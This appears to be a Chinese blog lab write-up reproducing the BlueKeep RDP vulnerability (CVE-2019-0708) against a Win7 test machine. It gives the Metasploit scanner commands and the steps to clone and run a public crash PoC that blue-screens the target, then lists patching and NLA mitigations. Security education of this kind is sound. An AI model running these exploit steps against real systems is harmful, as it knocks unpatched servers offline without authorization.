CVE-2019-0708 RDP漏洞利用

前言

2019.9
关于最近几天刚爆出来的CVE-2019-0708反弹shell的复现在我的另一篇文章

背景介绍

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7

环境:

攻击机:kali IP:192.168.137.44
靶机: win7 IP:192.168.137.190(开放3389端口)
工具360_RDP漏洞扫描工具(提取码: 59zd 解压密码:360)或 MSF框架
POC:https://github.com/n1xbyte/CVE-2019-0708

漏洞复现:

在这里插入图片描述

nmap对靶机端口扫描

漏洞扫描:

  1. 360_RDP漏洞扫描工具
c:\detector>0708detector.exe -t 192.168.91.138(要测试的目标IP) -p 3389(目标端口,一般都是3389)
在这里插入图片描述
  1. MSF
msf5 > search 0708    #查找 CVE-2019-0708漏洞
msf5 > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep  #利用漏洞扫描模块
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > show options  #查看参数
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > set rhosts 192.168.137.190 #设置靶机IP
msf5 auxiliary(scanner/rdp/cve_2019_0708_bluekeep) > run  #运行
在这里插入图片描述

漏洞攻击

  1. kali里默认没有pip3,先安装pip3,再安装impacket库
apt-get install python3-pip
pip3 install impacket
  1. 下载POC
git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708
  1. 进行攻击
python3 crashpoc.py 192.168.137.190 64  #python3 crashpoc.py ip地址 系统类型
在这里插入图片描述
在这里插入图片描述



POC运行成功以后目标系统出现蓝屏,虽然现阶段只是让目标蓝屏,但是对这个漏洞的利用手段绝对不会止步于此。

漏洞修复:

  1. 及时打对应系统的安全补丁
  2. 关闭3389端口或添加防火墙安全策略限制对3389端口的访问
  3. 打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

发表回复